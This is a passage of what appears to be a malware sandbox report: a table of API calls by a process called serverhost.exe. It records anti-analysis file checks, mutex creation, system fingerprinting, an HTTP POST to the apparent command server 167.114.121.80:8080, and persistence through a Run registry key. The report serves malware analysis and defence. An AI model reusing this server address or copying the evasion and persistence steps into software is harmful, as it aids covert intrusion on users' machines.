| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = CreateFileA, address_out = 0x7654cee8 |
|
1 | |
| Module | Load | module_name = ADVAPI32.dll, base_address = 0x75340000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\advapi32.dll, function = GetUserNameA, address_out = 0x7536a4b4 |
|
1 | |
| Module | Load | module_name = SHLWAPI.dll, base_address = 0x77060000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\shlwapi.dll, function = StrStrIA, address_out = 0x7706d250 |
|
1 | |
| Module | Load | module_name = ntdll.dll, base_address = 0x76ef0000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\ntdll.dll, function = strchr, address_out = 0x76f37690 |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| System | Get Computer Name | result_out = F71gwat, type = ComputerNameDnsHostname |
|
1 | |
| File | Create | filename = C:\email.doc, desired_access = GENERIC_READ |
|
1 | |
| File | Create | filename = C:\a\foobar.bmp, desired_access = GENERIC_READ |
|
1 | |
| Module | Get Handle | module_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, base_address = 0x9e0000 |
|
1 | |
| Module | Get Filename | module_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 259 |
|
1 | |
| Module | Load | module_name = KERNEL32.dll, base_address = 0x76500000 |
|
1 | |
| Module | Get Address | module_name = c:\windows\system32\kernel32.dll, function = WTSGetActiveConsoleSessionId, address_out = 0x7653480b |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Mutex | Create | mutex_name = MA991ED3B |
|
1 | |
| Module | Load | module_name = advapi32.dll, base_address = 0x75340000 |
|
1 | |
| Module | Load | module_name = ole32.dll, base_address = 0x76800000 |
|
1 | |
| Module | Load | module_name = shell32.dll, base_address = 0x75740000 |
|
1 | |
| Module | Load | module_name = crypt32.dll, base_address = 0x751f0000 |
|
1 | |
| Module | Load | module_name = urlmon.dll, base_address = 0x76a80000 |
|
1 | |
| Module | Load | module_name = userenv.dll, base_address = 0x746f0000 |
|
1 | |
| Module | Load | module_name = wininet.dll, base_address = 0x755a0000 |
|
1 | |
| Module | Load | module_name = wtsapi32.dll, base_address = 0x73a20000 |
|
1 | |
| System | Get Info | type = Windows Directory, result_out = C:\Windows |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| Service | Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 | |
| File | Create | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| Module | Create Mapping | module_name = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, protection = PAGE_READONLY, maximum_size = 0 |
|
1 | |
| Module | Map | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, desired_access = FILE_MAP_READ |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, type = size |
|
1 | |
| Module | Unmap | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe |
|
1 | |
| System | Get Computer Name | result_out = F71GWAT |
|
1 | |
| Mutex | Create | mutex_name = Global\I78B95E2E |
|
1 | |
| Mutex | Create | mutex_name = Global\M78B95E2E |
|
1 | |
| Mutex | Release | mutex_name = Global\I78B95E2E |
|
1 | |
| System | Get Time | type = Ticks, time = 22011 |
|
1 |
| Category | Operation | Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| System | Get Time | type = Ticks, time = 23025 |
|
1 | |
| System | Get Time | type = Ticks, time = 24024 |
|
1 | |
| System | Get Time | type = Ticks, time = 25022 |
|
1 | |
| System | Get Time | type = Ticks, time = 26020 |
|
1 | |
| Module | Get Filename | process_name = c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\serverhost.exe, file_name_orig = C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe, size = 260 |
|
1 | |
| System | Get Info | type = Operating System |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = 167.114.121.80, server_port = 8080, user_name = 0, password = 0 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, referrer = 0, accept_types = 0, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_NO_COOKIES, INTERNET_FLAG_KEEP_CONNECTION, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = 0 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_TRANSFER_ENCODING, HTTP_QUERY_LINK, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_CONTENT_TYPE, HTTP_QUERY_CONTENT_DESCRIPTION, HTTP_QUERY_FLAG_NUMBER, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 148, size_out = 148 |
|
1 | |
| Inet | Read Response | size = 0, size_out = 0 |
|
1 | |
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| Inet | Close Session |
|
1 | ||
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run, value_name = serverhost, data = "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\serverhost.exe", size = 148, type = REG_SZ |
|
1 | |
| System | Get Time | type = Ticks, time = 27081 |
|
2 | |
| System | Get Time | type = Ticks, time = 28017 |
|
1 | |
| System | Get Time | type = Ticks, time = 29016 |
|
1 | |
| System | Get Time | type = Ticks, time = 30014 |
|
1 | |
| System | Get Time | type = Ticks, time = 31012 |
|
1 | |
| System | Get Time | type = Ticks, time = 32027 |
|
1 | |
| System | Get Time | type = Ticks, time = 33025 |
|
1 | |
| System | Get Time | type = Ticks, time = 34023 |
|
1 | |
| System | Get Time | type = Ticks, time = 35022 |
|
1 | |
| System | Get Time | type = Ticks, time = 36020 |
|
1 | |
| System | Get Time | type = Ticks, time = 37019 |
|
1 | |
| System | Get Time | type = Ticks, time = 38017 |
|
1 | |
| System | Get Time | type = Ticks, time = 39031 |
|
1 | |
| System | Get Time | type = Ticks, time = 40014 |
|
1 | |
| System | Get Time | type = Ticks, time = 41012 |
|
1 | |
| System | Get Time | type = Ticks, time = 42026 |
|
1 | |
| System | Get Time | type = Ticks, time = 43025 |
|
1 |
